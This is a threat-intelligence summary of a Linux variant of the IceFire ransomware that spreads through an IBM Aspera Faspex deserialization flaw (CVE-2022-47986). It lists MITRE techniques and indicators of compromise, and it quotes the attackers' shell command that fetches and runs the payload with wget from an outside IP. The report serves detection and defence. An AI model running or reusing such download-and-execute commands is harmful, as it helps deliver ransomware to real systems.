IceFire re-emerges with a Linux variant that targeted enterprise networks, expanding beyond its previous Windows focus. It exploits a deserialization vulnerability in IBM Aspera Faspex (CVE-2022-47986) to drop and execute a Linux payload that encrypts files and renders ransom notes via a Tor onion service. #IceFire #AsperaFaspex #CVE-2022-47986 #OnionService
Keypoints
- New Linux version of IceFire observed in enterprise environments, notably in media and entertainment sector.
- Initial access achieved by exploiting CVE-2022-47986 in IBM Aspera Faspex file server.
- Linux payload delivered via wget from a remote DigitalOcean host (159.65.217.216) and executed from /opt/aspera/faspex.
- Files encrypted and renamed with the .ifire extension; the binary self-deletes after execution.
- Ransom note is embedded in the binary and the payment portal is hosted on a Tor onion service with hardcoded credentials.
- Exclusions exist for critical system folders; user and shared directories (e.g., /home, /mnt, /media, /share) are targeted.
MITRE Techniques
- [T1190] Exploit Public-Facing Application β The Linux variant was deployed by exploiting CVE-2022-47986 in IBM Aspera Faspex file sharing software.
- [T1105] Ingress Tool Transfer β IceFire payloads are hosted on a remote server and downloaded (e.g., wget) before execution. βwget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFireβ
- [T1059.004] Unix Shell β Deployment uses a shell command to orchestrate the download and execution. βsh -c rm -f demo iFire && wget β¦β
- [T1486] Data Encrypted for Impact β Files are encrypted and renamed with the β.ifireβ extension appended to the file name.
- [T1070.004] File Deletion β IceFire deletes itself by removing the binary after execution.
Indicators of Compromise
- [SHA-1] b676c38d5c309b64ab98c2cd82044891134a9973 β Linux IceFire binary sample
- [IP] 159.65.217.216 β DigitalOcean host delivering payloads (via port 8080)
- [Domain] onion domain for ransom portal β 7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd.onion
- [URL] http://159.65.217.216:8080/([β¦subdomainβ¦|IP_Address)/iFire β payload delivery URL
- [File Path] /opt/aspera/faspex β location where payloads are saved/executed
- [File Path] /home/Jhone/Desktop β referenced in cryptographic logging artifact
- [File Extension] .iFire β encryption extension used on targeted files
- [Cookie] _aspera_faspex_session β Aspera Faspex session cookie observed in activity
- [RSA Public Key] β embedded in the binary (BEGIN RSA PUBLIC KEY β¦ END RSA PUBLIC KEY)
Read more: https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/